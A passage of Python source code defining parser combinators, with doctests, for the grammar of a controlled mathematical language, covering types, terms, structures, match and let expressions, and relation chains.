This is inspired by Harrison's {a | b | c} set comprehension notation.
>>> pstream(holding_vars(),', holding x,y,z')
Etok(holding_vars,', holding x , y , z')
"""
def f(acc):
((_,_),cs) = acc
return Etok(name='holding_vars',etoks=cs[0::2],raw=acc)
return (comma + next_word('holding') + c.plus_comma(var())).treat(f,'holding_vars')
@memo
def proof_expr():
r"""parser for the QED symbol
>>> pstream(proof_expr(),r'\qed')
Etok(SYMBOL_QED,\qed,'\qed')
"""
return c.next_type('SYMBOL_QED').treat(Etok.etok,'proof_expr')
@memo
def tightest_expr():
"""
Parser for expressions in which the boundaries are clear.
"""
return first(get_lookup_parse('tightest_term'),
get_lookup_parse('tightest_prop'),
get_lookup_parse('tightest_type'),
proof_expr())
@memo
def sort_expr():
"""Parser for arrows ending in rawvalue Sort or Type
>>> pstream(sort_expr(),'BINDER_TYPE -> Type')
Etok(sort_expr,'BINDER_TYPE -> type')
"""
def f(acc):
(m,s) = acc
m1 = [a for (a,_) in m]
return Etok(name='sort_expr',etoks=(m1,s),raw=acc)
return c.LazyParse((lambda s:((get_lookup_parse(s) + c.next_type('ARROW')).many() + read_keyword('sort')).treat(f,'sort_expr')),'binder_type')
# colon_sort above
# opt_colon_sort above
@memo
def paren_type():
"""Parser for a type wrapped in parentheses
>>> pstream(paren_type(),'(GENERAL_TYPE)')
Etok(general_type,backdoor1,'GENERAL_TYPE')
"""
def f(acc):
(_,a,_) = acc
return a
return c.paren(get_lookup_parse('general_type')).treat(f,'paren_type')
@memo
def annotated_type():
"""Parser for an annotated type
>>> pstream(annotated_type(),'(GENERAL_TYPE : Type)')
Etok(general_type,backdoor1,'GENERAL_TYPE')
"""
def f(acc):
(_,((a,_),_),_)=acc
return a
return c.paren(get_lookup_parse('general_type') + colon + rawtype).treat(f,'annotated_type')
@memo
def controlseq_type():
"""Parser for a control sequence type
>>> pstream(controlseq_type(),'PRIM_TYPE_CONTROLSEQ { TERM }')
Etok(cs_brace,prim_type_controlseq,'PRIM_TYPE_CONTROLSEQ { TERM }')
"""
return cs_brace(get_lookup_parse('prim_type_controlseq'))
@memo
def const_type():
"""Parser for an identifier representing a type"""
return get_lookup_parse('prim_identifier_type')
@memo
def field_type():
"""Parser for a field of a structure"""
def f(acc):
return Etok('field_type',etoks=acc,raw=acc)
return (get_lookup_parse('tighteset_term') + get_lookup_parse('prim_field_type_accessor')).treat(f,'field_type')
@memo
def over_args():
"""Parser for the experimental feature of using keyword over to
unbundle structures
input (there are three different forms, shown in examples)
output Etok(over_args,1 2 or 3)
>>> pstream(over_args(),'over { a := TERM ; b := TERM }')
Etok(over_args,1,'over { a := TERM ; b := TERM }')
>>> pstream(over_args(),'over TIGHTEST_TERM')
Etok(over_args,2,'over TIGHTEST_TERM')
>>> pstream(over_args(),'(over TIGHTEST_TERM,TIGHTEST_TERM)')
Etok(over_args,3,'( over TIGHTEST_TERM , TIGHTEST_TERM )')
"""
over = next_word('over')
def over_args1():
#n_acc = []
#def f_brace(acc):
# nonlocal n_acc
# (_,(_,b,_)) = acc
# n_acc = acc
# return b[0::2] #remove semi
#def f1(acc):
# return Etok(name='over_args',etoks=acc[0::2],raw=n_acc,rule='1')
#return ((over + c.brace_semif()).treat(f_brace).reparse_list(var_or_atomic() + assign_expr())).treat(f1,'over_args1')
def f(acc):
(_,(_,b,_))=acc
return Etok(name='over_args',etoks=b[0::2],raw=acc,rule='1')
p = (var_or_atomic() + assign_expr())
return (over + c.brace(p.plus(semicolon))).treat(f,'over_args1')
def over_args2():
def f2(acc):
(_,b)=acc
return Etok(name='over_args',etoks=b,raw=acc,rule='2')
return (over + get_lookup_parse('tightest_term')).treat(f2,'over_args2')
def over_args3():
def f3(acc):
(_,(_,b),_)=acc
return Etok(name='over_args',etoks=b[0::2],raw=acc,rule='3')
return (c.paren(over + c.plus_comma(tightest_expr()))).treat(f3,'over_args3')
return first(over_args1() , over_args2() , over_args3())
@memo
def overstructure_type():
"""Parser for overstructure.
The structure name must be a primitive identitifer.
>>> pstream(overstructure_type(),'PRIM_STRUCTURE { x:= TERM } TIGHTEST_EXPR over TIGHTEST_TERM')
Etok(overstructure_type,'PRIM_STRUCTURE { x := TERM } TIGHTEST_EXPR over TIGHTEST_TERM')
"""
def f(acc):
return Etok(name='overstructure_type',etoks=acc,raw=acc)
return (get_lookup_parse('prim_structure') + app_args() + over_args().possibly()).treat(f,'overstructure_type')
@memo
def var_type():
"""
Parser for a type variable.
If not annotated, the var should be
previously annotated (v : Type) in the context.
Output: Etok(VAR_TYPE,v,'v') (in LexToken format)
>>> pstream(var_type(),'(v:Type)')
Etok(VAR_TYPE,v,'( v : type )')
"""
def f(acc):
return acc.update({'name':'VAR_TYPE'})
def f2(acc):
(_,((v,_),_),_) = acc
return Etok.rawupdate(v,acc)
return (var() | c.paren(var() + colon + rawtype).treat(f2)).treat(f,'var_type')
@memo
def subtype():
r"""
Parser for a subtype comprehension { x // P(x)}
>>> pstream(subtype(),r'{ TERM, holding x \tmid STATEMENT }')
Etok(subtype,'{ TERM , holding x \tmid STATEMENT }')
"""
def f(acc):
(_,(((t,h),_),s),_)=acc
return Etok(name='subtype',etoks=(t,h,s),raw=acc)
return c.brace(get_lookup_parse('term') + holding_vars().possibly() + c.next_type('TMID') + get_lookup_parse('statement')).treat(f,'subtype')
@memo
def app_type():
"""Parser for the application of a type to its arguments
>>> pstream(app_type(),'TIGHTEST_TYPE TIGHTEST_EXPR')
Etok(app_type,tightest_type,'TIGHTEST_TYPE TIGHTEST_EXPR')
"""
def f(acc):
return Etok(name='app_type',etoks=acc,raw=acc,rule='tightest_type')
return ((get_lookup_parse('tightest_type') + app_args()).treat(f,'app_type') |
overstructure_type())
@memo
def binder_comma():
"""Parser for a comma in a binder expression"""
def f(acc):
return Etok(name='binder_comma',etoks=[Etok.etok(acc)],raw=[acc])
return comma.treat(f,'binder_comma')
@memo
def binder_type():
"""Recursive parser for type binders (Pi-types, etc.)
>>> pstream(binder_type(),'PRIM_PI_BINDER TIGHTEST_EXPR, TIGHTEST_TYPE')
Etok(binder_type,'PRIM_PI_BINDER TIGHTEST_EXPR , TIGHTEST_TYPE')
"""
def f(acc):
(((p,a),_),b)=acc
return Etok(name='binder_type',etoks=(p,a,b),raw=acc)
return (app_type() |
(get_lookup_parse('prim_pi_binder') + tightest_args() + binder_comma() + c.lazy_call(binder_type)).treat(f,'binder_type')
)
@memo
def agda_vars():
"""
Agda style dependent type variables (a : A ) -> B(a)
>>> pstream(agda_vars(),'(x : POST_COLON_TYPE) (z u : POST_COLON_TYPE)')
Etok(agda_vars,'( x : POST_COLON_TYPE ) ( z u : POST_COLON_TYPE )')
"""
def f(acc):
return Etok(name='agda_vars',etoks=acc,raw=acc)
return annotated_vars().plus().treat(f,'agda_vars')
@memo
def _type_operand():
"""
Parser for argument of a binary type operation.
"""
return binder_type() | agda_vars()
@memo
def _type_op():
"""Parser for a binary type operator
>>> pstream(_type_op(),'PRIM_TYPE_OP')
Etok(prim_type_op,backdoor1,'PRIM_TYPE_OP')
>>> pstream(_type_op(),'PRIM_TYPE_OP_CONTROLSEQ { TERM }')
Etok(cs_brace,prim_type_op_controlseq,'PRIM_TYPE_OP_CONTROLSEQ { TERM }')
"""
return (get_lookup_parse('prim_type_op') |
cs_brace(get_lookup_parse('prim_type_op_controlseq')))
@memo
def binop_type():
"""Parser for binary operation on types.
for product types A * B, sum types A + B,
including arrows A -> B,
including Agda style dependent arrows (x:A) -> B x.
all type operators are right assoc with the same precedence
N.B. binder_types is tighter than binop_type, which might be non-intuitive.
Operators appear in etoks[1] odd positions.
>>> pstream(binop_type(),'TIGHTEST_TYPE PRIM_TYPE_OP TIGHTEST_TYPE')
Etok(binop_type,'TIGHTEST_TYPE PRIM_TYPE_OP TIGHTEST_TYPE')
"""
def f(acc):
((p,m),b) = acc
return Etok(name='binop_type',etoks=(p,m+[b]),raw=acc)
return (brace_noassign().possibly() + (_type_operand() + _type_op()).many() + binder_type()).treat(f,'binop_type')
@memo
def quotient_type():
"""parser for quotient types
>>> pstream(quotient_type(),'quotient of GENERAL_TYPE by TERM')
Etok(quotient_type,'quotient of GENERAL_TYPE by TERM')
"""
def f(acc):
((((_,_),g),_),t) = acc
return Etok(name='quotient_type',etoks=(g,t),raw=acc)
return (next_word('quotient') + next_word('of').possibly() +
get_lookup_parse('general_type') + next_word('by') +
get_lookup_parse('term')).treat(f,'quotient_type')
@memo
def coercion_type():
r"""parser for coercion of a term to type
>>> pstream(coercion_type(),r'\^TERM')
Etok(coercion_type,'\^ TERM')
"""
def f(acc):
(_,t)=acc
return Etok(name='coercion_type',etoks=[t],raw=acc)
return (c.next_type('COERCION') + get_lookup_parse('term')).treat(f,'coercion_type')
@memo
def coerced_type():
"""parser for (possibly implicit) coercion from term to type
>>> pstream(coerced_type(),'TERM')
Etok(coercion_type,'TERM')
"""
def f(acc):
return Etok(name='coercion_type',etoks=[acc],raw=acc)
return (coercion_type() | get_lookup_parse('term').treat(f,'coerced_type'))
@memo
def opentail_type():
"""Parser for binop, quotient, or coercion type"""
return first(binop_type() , quotient_type() , coercion_type())
@memo
def post_colon_type():
"""parser for type appearing after a colon
>>> pstream(post_colon_type(),'PRIM_RELATION')
Etok(post_colon_type,2,'PRIM_RELATION')
"""
def f2(acc):
return Etok(name='post_colon_type',etoks=acc,raw=acc,rule='2')
return first(get_lookup_parse('general_type') ,
(get_lookup_parse('prim_relation') + app_args()).treat(f2,'post_colon_type-2') ,
coerced_type())
# general_type - implement after attribute
@memo
def hierarchical_identifier():
"""
Parser for hierarchical identifiers.
Output is a Etok.
"""
return c.next_type('HIERARCHICAL_IDENTIFIER').treat(Etok.etok,'hierarchical_identifier')
@memo
def identifier():
"""parser for hierarchical or atomic identifier.
Output is a single Etok"""
return (atomic() | hierarchical_identifier()).name('identifier')
@memo
def _opt_alt_constructor():
"""Parser for a single constructor in an inductive type declaration.
>>> pstream(_opt_alt_constructor(),'| id : POST_COLON_TYPE')
Etok(alt_constructor,'| id : POST_COLON_TYPE')
"""
def f(acc):
(((_,i),a),t)=acc
return Etok(name='alt_constructor',etoks=(i,a,t),raw=acc)
return (c.next_type('ALT') + identifier() + args_template() + opt_colon_type()).treat(f,'_opt_alt_constructor')
def not_period(tok):
"""boolean token test for non-period."""
return not(tok.type == 'PERIOD')
#no memo parameter
def not_end(tok):
"""boolean token test for not keyword 'end'"""
return not(tok.value == 'end') and not_period(tok)
@memo
def field_prefix():
"""
parser for field prefixes:
coercion notationless notation parameter type call
These are decorators or attributes.
coercion - structure coerces to this field
parameter - field can float to unbundled position
type - objects can coerce to this type.
call - objects can be used as a function.
notation - field is for notational type classing.
notationless - ??
>>> pstream(field_prefix(),' random ')
Etok(field_prefix,'')
>>> pstream(field_prefix(),'a type,call,notation')
Etok(field_prefix,'a type , call , notation')
"""
def f(acc):
keys = []
if acc:
(_,keys) = acc
keys = keys[0::2]
return Etok(name='field_prefix',etoks=keys,raw=acc)
return (lit('a').possibly() +
c.plus_comma(read_keyword('field_key'))).possibly().treat(f,'field_prefix')
@memo
def field_identifier():
"""Parser for identifier in one field of structure declaration
The word 'proof' or '_' can be used as
anonymous field identifiers for props.
>>> pstream(field_identifier(),'x : POST_COLON_TYPE')
Etok(field_identifier,'x : POST_COLON_TYPE')
>>> pstream(field_identifier(),'proof')
Etok(PROOF,proof,'proof')
"""
def fp(acc):
return Etok(name='PROOF',etoks=[],raw=acc,rule='proof')
def f(acc):
return Etok(name='field_identifier',etoks=acc,raw=acc)
return first(get_lookup_parse('prim_structure') ,
(next_word('proof')|c.next_value('_')).treat(fp) ,
(var_or_atomic() +
opt_colon_sort_or_type()
).treat(f,'field_identifier')
)
@memo
def field():
"""Parser for one field of a structure
>>> pstream(field(),'a call,type,parameter x := TERM')
Etok(field,'a call , type , parameter x := TERM')
"""
def f(acc):
((a,b),c)=acc
return Etok(name='field',etoks=(a,b,c),raw=acc)
return (field_prefix() + field_identifier() + assign_expr().possibly()).treat(f,'field')
@memo
def structure():
"""Parser for a structure declaration
>>> pstream(structure(),'notational structure with parameters { x : POST_COLON_TYPE } with { parameter y := TERM }')
Etok(structure,'notational structure with parameter { x : POST_COLON_TYPE } with { parameter y := TERM }')
"""
def f(acc):
((((n,_),t),_),(_,b,_))=acc
if t:
(_,t)=t
return Etok(name='structure',etoks=(n,t,b[0::2]),raw=acc)
# Prohibit identifiers named 'with' to avoid grammar ambiguity.
return (next_word('notational').treat(Etok.etok).possibly() +
next_word('structure') +
(lit('param').possibly() + nonempty_args_template(omit=['with'])).possibly() +
next_word('with').possibly() +
c.brace(field().plus(semicolon))).treat(f,'structure')
proof_expr # implemented above
@memo
def controlseq_term():
"""parser for terms expressed as control sequences
>>> pstream(controlseq_term(),'PRIM_TERM_CONTROLSEQ { TERM }')
Etok(cs_brace,prim_term_controlseq,'PRIM_TERM_CONTROLSEQ { TERM }')
"""
return cs_brace(get_lookup_parse('prim_term_controlseq'))
@memo
def tightest_prefix():
"""Parser for very tightly bound terms.
This prefix is the stem of the term, to which suffixes are added.
>>> pstream(tightest_prefix(),'33.456')
Etok(DECIMAL,33.456,'33.456')
>>> pstream(tightest_prefix(),'1799')
Etok(INTEGER,1799,'1799')
"""
return first(Parse.next_token().if_types(['DECIMAL','INTEGER','STRING','BLANK','VAR']).treat(Etok.etok,'tightest_prefix') ,
get_lookup_parse('prim_identifier_term') ,
controlseq_term() ,
get_lookup_parse('delimited_term') , #future reference
get_lookup_parse('alt_term')) #future reference
@memo
def tightest_suffix():
"""Recursive parser for suffix to a tightly bound term.
The suffix can be a .field (field accessor) or subscript
"""
return first(get_lookup_parse('prim_field_term_accessor') ,
(c.lazy_call(tightest_subscript))
)
@memo
def tightest_term():
r"""Parser for a tightly bound term
>>> pstream(tightest_term(),r'33.456 PRIM_FIELD_TERM_ACCESSOR\sub(3)')
Etok(tightest_term,'33.456 PRIM_FIELD_TERM_ACCESSOR \sub ( 3 )')
"""
def f(acc):
return Etok(name='tightest_term',etoks=acc,raw=acc)
return (tightest_prefix() + tightest_suffix().many()).treat(f,'tightest_term')
@memo
def tightest_subscript():
"""Parser for subscript
APPLYSUB handles subscripts coming from a TeX file.
The braces have been converted to ()
In brief,
x_1 is an identifier.
x APPLYSUB (1) is equivalent to x 1 and is the de-TeXed form of x_{1}.
x APPLYSUB (i j) is equivalent to x i j. (This is perhaps a surprise.)
x APPLYSUB ((f j)) is equivalent to x (f j).
"""
def f(acc):
(_,(_,t,_))=acc
return Etok(name='apply_sub',etoks=t,raw=acc)
return (c.next_type('APPLYSUB') + c.paren(tightest_term().plus())).treat(f,'tightest_subscript')
controlseq_term # defined above
var_or_atomic_or_blank # defined above
@memo
def annotated_term():
return annotated(get_lookup_parse('term'))
@memo
def set_enum_term():
"""parser for set enumeration
>>> pstream(set_enum_term(),'{ PLAIN_TERM, PLAIN_TERM, PLAIN_TERM }')
Etok(set_enum_term,'{ PLAIN_TERM , PLAIN_TERM , PLAIN_TERM }')
"""
def f(acc):
(_,t,_)=acc
t = t[0::2]
return Etok(name='set_enum_term',etoks=t,raw=acc)
return c.brace(c.many_comma(get_lookup_parse('plain_term'))).treat(f,'set_enum_term')
@memo
def set_comprehension_term():
"""Parser for set comprehension
>>> pstream(set_comprehension_term(),'{ PLAIN_TERM, holding u,v \mid STATEMENT}')
Etok(set_comprehension_term,'{ PLAIN_TERM , holding u , v \mid STATEMENT }')
"""
def f(acc):
(_,(((p,h),_),s),_)=acc
return Etok(name='set_comprehension_term',etoks=(p,h,s),raw=acc)
return c.brace(get_lookup_parse('plain_term') + holding_vars() + c.next_type('MID') + get_lookup_parse('statement')).treat(f,'set_comprehension_term')
@memo
def tuple_term():
"""Parser for n=tuples.
There must be at least one comma.
(x) is parsed as x in parentheses.
>>> pstream(tuple_term(),'(PLAIN_TERM,PLAIN_TERM,PLAIN_TERM)')
Etok(tuple_term,'( PLAIN_TERM , PLAIN_TERM , PLAIN_TERM )')
"""
def f(acc):
(_,((p,_),ps),_)=acc
ps = [p]+ps[0::2]
return Etok(name='tuple_term',etoks=ps,raw=acc)
return c.paren(get_lookup_parse('plain_term') + comma + c.plus_comma(get_lookup_parse('plain_term'))).treat(f,'tuple_term')
@memo
def list_term():
"""Parser for lists: [a;b;c], possibly empty []
>>> pstream(list_term(),'[PLAIN_TERM;PLAIN_TERM;PLAIN_TERM]')
Etok(list_term,'[ PLAIN_TERM ; PLAIN_TERM ; PLAIN_TERM ]')
"""
def f(acc):
(_,ps,_)=acc
ps = ps[0::2]
return Etok(name='list_term',etoks=ps,raw=acc)
return c.bracket(get_lookup_parse('plain_term').many(semicolon)).treat(f,'list_term')
@memo
def make_term():
"""parser for make statement (structure constructor).
DEBUG: I forget the purpose of the tightest_type.
>>> pstream(make_term(),'make { it : POST_COLON_TYPE := TERM }')
Etok(make_term,'make { it : POST_COLON_TYPE := TERM }')
"""
#def fp(acc):
# ((a,b),c)=acc
# return (a,b,c)
#def f(acc):
# ((_,t),(_,b,_)) = acc
# p = (var_or_atomic_or_blank() + opt_colon_type() +
# assign_expr().possibly()).treat(fp)
# b = c.retreat_list(p,b)
# return Etok('make_term',etoks=(t,b),raw=acc)
#return (next_word('make') + get_lookup_parse('tightest_type').possibly() +
# c.brace_semif()).treat(f,'make_term')
def f(acc):
((_,t),(_,bs,_))=acc
bs = [(a,b,c) for ((a,b),c) in bs[0::2]]
return Etok('make_term',etoks=(t,bs),raw=acc)
p = (var_or_atomic_or_blank() + opt_colon_type() +
assign_expr().possibly())
return (next_word('make') + get_lookup_parse('tightest_type').possibly() +
c.brace(p.plus(semicolon))).treat(f,'make_term')
@memo
def paren_term():
"""parser for term in parentheses
>>> pstream(paren_term(),'(TERM)')
Etok(term,backdoor1,'( TERM )')
"""
def f(acc):
(_,t,_)=acc
return Etok.rawupdate(t,acc)
return c.paren(get_lookup_parse('term')).treat(f,'paren_term')
@memo
def delimited_term():
"""Parser for terms that are delimited:
(x), (x : A), make { x := 3 }, [1;2],
{3,4}, (5,6), {x : f(x)}
>>> pstream(delimited_term(),'(TERM)')
Etok(term,backdoor1,'( TERM )')
"""
return first(paren_term() ,
annotated_term() ,
make_term() ,
list_term() ,
tuple_term() ,
set_enum_term() ,
set_comprehension_term())
@memo
def alt_case():
"""Parser for a single case of a case term
>>> pstream(alt_case(),'| PROP := PLAIN_TERM')
Etok(alt_case,'| PROP := PLAIN_TERM')
"""
def f(acc):
(((_,p),_),t)=acc
return Etok(name='alt_case',etoks=(p,t),raw=acc)
return (c.next_type('ALT') + get_lookup_parse('prop') + c.next_type('ASSIGN') + get_lookup_parse('plain_term')).treat(f,'alt_case')
@memo
def case_term():
"""Parser for a case term
>>> pstream(case_term(),'case | PROP := PLAIN_TERM end')
Etok(case_term,'case | PROP := PLAIN_TERM end')
"""
def f(acc):
((_,a),_)=acc
a= c.retreat_list(alt_case().plus(),[lib.fflatten(a)])
return Etok(name='case_term',etoks=a[0],raw=acc)
return (c.next_word('case')+ c.balanced_condition(not_end) +c.next_word('end')).treat(f,'case_term')
@memo
def app_term():
"""Parser for a function applied to arguments
"""
def f(acc):
return Etok(name='app_term',etoks=acc,raw=acc)
return (tightest_term() + app_args()).treat(f,'app_term')
@memo
def match_pats():
return c.plus_comma(get_lookup_parse('plain_term'))
@memo
def alt_match():
"""Parser for a single alternative in match term"""
def f(acc):
(((_,p),_),p2)=acc
return Etok(name='alt_match',etoks=(p,p2),raw=acc)
return (c.next_type('ALT')+match_pats()+c.next_type('ASSIGN')+get_lookup_parse('plain_term')).treat(f,'alt_match')
@memo
def match_term():
"""Parser for a match term
>>> pstream(match_term(),'match PLAIN_TERM with | PLAIN_TERM := PLAIN_TERM end')
Etok(match_term,'match PLAIN_TERM with | PLAIN_TERM := PLAIN_TERM end')
"""
def f(acc):
((((_,mp),_),b),_)=acc
b = c.retreat_list(alt_match().plus(),[lib.fflatten(b)])
return Etok(name='match_term',etoks=(mp,b[0]),raw=acc)
return (next_word('match') + match_pats() + next_word('with') +
c.balanced_condition(not_end) + next_word('end')
).treat(f,'match_term')
@memo
def match_function():
"""parser for a function with match statement
>>> pstream(match_function(),'function | PLAIN_TERM := PLAIN_TERM end')
Etok(match_function,'function | PLAIN_TERM := PLAIN_TERM end')
"""
def f(acc):
((((_,t),o),b),_)=acc
b = c.retreat_list(alt_match().plus(),[lib.fflatten(b)])
return Etok(name='match_function',etoks=(t,o,b),raw=acc)
return (next_word('function') + args_template() +
opt_colon_type() + c.balanced_condition(not_end) +
next_word('end')).treat(f,'match_function')
@memo
def alt_term():
"""Parser for term following the '| ... end' template"""
return first(case_term() , match_term() , match_function())
# opentail_term - later
@memo
def lambda_term():
"""Parser for lambda abstraction
>>> pstream(lambda_term(),'TDOP_TERM \mapsto OPENTAIL_TERM')
Etok(mapsto,'TDOP_TERM \mapsto OPENTAIL_TERM')
>>> pstream(lambda_term(),'fun TIGHTEST_EXPR := OPENTAIL_TERM')
Etok(fun_term,'fun TIGHTEST_EXPR := OPENTAIL_TERM')
"""
def f1(acc):
((t,_),o)=acc
return Etok(name='mapsto',etoks=(t,o),raw=acc)
def f2(acc):
(((p,a),_),o)=acc
return Etok(name='lambda_term',etoks=(p,a,o),raw=acc)
def f3(acc):
(((_,t),_),o)=acc
return Etok(name='fun_term',etoks=(t,o),raw=acc)
return first((get_lookup_parse('tdop_term') + c.next_type('MAPSTO') + get_lookup_parse('opentail_term')).treat(f1,'mapsto') ,
(get_lookup_parse('prim_lambda_binder') + tightest_args() + binder_comma() + get_lookup_parse('opentail_term')).treat(f2,'lambda_term') ,
(next_word('fun')+ tightest_args() + c.next_type('ASSIGN') + get_lookup_parse('opentail_term')).treat(f3,'fun_term')
)
@memo
def let_term():
"""Parser for let ....
>>> pstream(let_term(),'let x := PLAIN_TERM in OPENTAIL_TERM')
Etok(let,'let x := PLAIN_TERM in OPENTAIL_TERM')
"""
def f(acc):
(((((_,p),_),t),_),o)=acc
return Etok(name='let',etoks=(p,t,o),raw=acc)
return (next_word('let') + tightest_prefix() +
c.next_type('ASSIGN') + get_lookup_parse('plain_term') + next_word('in') + get_lookup_parse('opentail_term')).treat(f,'let_term')
@memo
def if_then_else_term():
"""Parse 'if bool then A else B'
>>> pstream(if_then_else_term(),'if PROP then PLAIN_TERM else OPENTAIL_TERM')
Etok(if_then_else_term,'if PROP then PLAIN_TERM else OPENTAIL_TERM')
"""
def f(acc):
(((((_,p),_),t),_),f)=acc
return Etok(name='if_then_else_term',etoks=(p,t,f),raw=acc)
return (next_word('if') + get_lookup_parse('prop') +
next_word('then') + get_lookup_parse('plain_term') + next_word('else') + get_lookup_parse('opentail_term')).treat(f,'if_then_else_term')
@memo
def opentail_term():
"""Recursive parser for terms with open tails.
These are terms that can be iterated as in
let x := y in let u:= v in tail
if b then t else if b2 then t2 else tail
Specifically, this includes lambdas, let, if_then, tdop
>>> pstream(opentail_term(),'let x := PLAIN_TERM in OPENTAIL_TERM')
Etok(let,'let x := PLAIN_TERM in OPENTAIL_TERM')
"""
return first(c.lazy_call(lambda_term) ,
c.lazy_call(let_term) ,
c.lazy_call(if_then_else_term) ,
get_lookup_parse('tdop_term')
)
@memo
def where_suffix():
"""suffix to Haskell 'where'
>>> pstream(where_suffix(),'where { x : POST_COLON_TYPE := TERM ; y := TERM }')
Etok(where_suffix,'where { x : POST_COLON_TYPE := TERM ; y := TERM }')
"""
#def f_inner(acc):
# ((a,b),c)=acc
# return (a,b,c)
#def f(acc):
# (_,(_,b,_))=acc
# b=c.retreat_list((var()+opt_colon_type()+assign_expr().possibly()).treat(f_inner),b[0::2])
# return Etok(name='where_suffix',etoks=b,raw=acc)
#return (next_word('where') + c.brace_semif()).treat(f,'where_suffix')
def f(acc):
(_,(_,bs,_))=acc
bs = [(a,b,c) for ((a,b),c) in bs[0::2]]
return Etok(name='where_suffix',etoks=bs,raw=acc)
p = (var()+opt_colon_type()+assign_expr().possibly())
return (next_word('where') + c.brace(p.plus(semicolon))).treat(f,'where_suffix')
@memo
def where_term():
"""Parser for term with (possible) Haskell style where suffix
>>> pstream(where_term(),'TDOP_TERM where {x : POST_COLON_TYPE := TERM }')
Etok(where_term,'TDOP_TERM where { x : POST_COLON_TYPE := TERM }')
"""
def f(acc):
return Etok('where_term',etoks=acc,raw=acc)
return (opentail_term() + where_suffix().possibly()).treat(f,'where_term')
@memo
def term_op():
"""Parser for symbolic operators
>>> pstream(term_op(),'PRIM_TERM_OP_CONTROLSEQ { TERM } {TERM }')
Etok(cs_brace,prim_term_op_controlseq,'PRIM_TERM_OP_CONTROLSEQ { TERM } { TERM }')
"""
return first(get_lookup_parse('prim_term_op') ,
cs_brace(get_lookup_parse('prim_term_op_controlseq'))
)
@memo
def term_ops():
return term_op().plus()
@memo
def definite_term():
"""term with a definite article, subsuming where_term
>>> pstream(definite_term(),'the PRIM_DEFINITE_NOUN')
Etok(prim_definite_noun,backdoor1,'the PRIM_DEFINITE_NOUN')
"""
def f(acc):
(_,t)=acc
return Etok.rawupdate(t,acc)
return first(where_term() ,
(next_word('the') + get_lookup_parse('prim_definite_noun')).treat(f,'definite_term')
)
@memo
def any_args():
def f(acc):
b = acc[0::2]
return Etok(name='any_args',etoks=b,raw=acc)
return c.plus_comma(var() | annotated_vars()).treat(f,'any_args')
@memo
def any_name():
"""Parse for terms with forthel
natural language quantification
every x, each x, all x, no x, some x,...
>>> pstream(any_name(),'every x, y, z')
Etok(any_name,'every x , y , z')
"""
def f(acc):
return Etok(name='any_name',etoks=acc,raw=acc)
return (lit_any() +
first(any_args() ,
get_lookup_parse('pseudoterm') ,
get_lookup_parse('general_type'))).treat(f,'any_name')
@memo
def term():
"""parser for terms, subsuming all other terms (through definite_term)"""
def f(acc):
(_,t)=acc
return Etok.rawupdate(t,acc)
return first((get_lookup_parse('prim_classifier').possibly() + definite_term()).treat(f,'term') ,
any_name())
@memo
def terms():
def f(acc):
return Etok(name='terms',etoks=acc[0::2],raw=acc)
return c.plus_andcomma(term()).treat(f,'terms')
def isplains(etoks):
"""Boolean test if a (nested) list of Etok is plain.
All elements must be Etok s (or test to False).
"""
return all(isplain(e) for e in lib.fflatten(etoks) if e)
def isplain(etok):
"""Boolean test if an Etok is plain.
Input must be an Etok.
"""
if tokenlib.is_lex(etok):
return True
if etok.name=='any_name':
return False
return isplains(etok.etoks)
@memo
def plain_term():
"""
Following Forthel 1.3.3,
a plain_term contains no any_name recursively within it.
We implement this with a separate check that the term is plain,
rather than build plain terms as a separate nonterminal.
We require plain terms on the right-hand-side of definitions.
Also, in dependent types, the terms should be plain.
"""
return term().if_test(isplain)
@memo
def tdop_term():
"""Parser for an expression involving symbolic operators.
tdop = top down operator precedence,
which is how such expressions will eventually be handled.
Here we just collect together the tokens in the expression
for later handling.
In the expression, there are no adjacent non-symbolic terms.
That is, f x + y is interpreted as function application of f to x...
There can be adjacent symbols: 3! + 1.
The expression can optionally begin or end with a symbol.
The expression might be a solitary symbol or app_term.
There are three general precedence categories built into
the grammar.
* prop operators; (precedence < 0)
* binary relation operators such as "="; (precedence=0)
* term operators. (precedence > 0) (this case).
This allows us to distinguish terms from props and types.
>>> pstream(tdop_term(),'x PRIM_TERM_OP y')
Etok(tdop_term,'x PRIM_TERM_OP y')
"""
def f(acc):
(((p,o),ao),tp)=acc
r=[o]+ao
if p:
r =[p]+r
if tp:
r=r+[tp]
return Etok('tdop_term',etoks=r,raw=acc)
return first((app_term().possibly() + term_ops() +
(app_term() + term_ops()).many() +
app_term().possibly()).treat(f,'tdop_term') ,
app_term()
)
@memo
def adjective_left_attribute():
def f(acc):
return Etok(name='adjective_left_attribute',etoks=acc,raw=acc)
return (next_word('non').treat(Etok.etok).possibly() + get_lookup_parse('prim_simple_adjective')).treat(f,'adjective_left_attribute')
@memo
def multisubject_left_attribute():
return (get_lookup_parse('prim_simple_adjective_multisubject'))
@memo
def left_attribute():
return first(adjective_left_attribute() ,
multisubject_left_attribute())
@memo
def is_right_attribute():
def f(acc):
return Etok(name='is_right_attribute',etoks=acc[0::2],raw=acc)
return c.plus_andcomma(get_lookup_parse('is_pred')).treat(f,'is_right_attribute')
@memo
def does_right_attribute():
def f(acc):
(_,t)=acc
return Etok(name='does_right_attribute',etoks=t[0::2],raw=acc)
return (next_word('that') + c.plus_andcomma(get_lookup_parse('does_pred'))).treat(f,'does_right_attribute')
@memo
def such_that_right_attribute():
def f(acc):
(_,t)=acc
return Etok.rawupdate(t,acc)
return (c.next_phrase('such that') + get_lookup_parse('statement')).treat(f,'such_that_right_attribute')
@memo
def right_attribute():
return first(is_right_attribute() , does_right_attribute() , such_that_right_attribute())
def attribute(p):
"""Parser for a term with left and right attributes
"""
def f(acc):
return Etok(name='attribute',etoks=acc,raw=acc)
return (left_attribute().many() + p + right_attribute().possibly()).treat(f,'attribute')
@memo
def general_type():
"""parser for a general type.
This is one of the main nonterminals.
It subsumes all specialized type nonterminals.
"""
return attribute(opentail_type())
@memo
def binary_relation_op():
"""binary relation symbols"""
return first(get_lookup_parse('prim_binary_relation_op') ,
cs_brace(get_lookup_parse('prim_binary_relation_controlseq'))
)
# deprecated, now part of tdop_rel_prop
#def tdop_terms():
# def f(acc):
# return Etok(name='tdop_terms',etoks=acc[0::2],raw=acc)
# return c.plus_andcomma(tdop_term).treat(f,'tdop_terms')
@memo
def tdop_rel_prop():
"""Parser for terms chained by binary relation symbols.
All symbols have the same precedence 0.
We allow x,y < z < w. The first arg can be a list of terms.
The chain expands as x < z and y < z and z < w.
output contains the list [x<z,y<z,z<w] (coded as Etoks)
No parentheses allowed in chain.
>>> pstream(tdop_rel_prop(),'x,y,z PRIM_BINARY_RELATION_OP u PRIM_BINARY_RELATION_OP x')
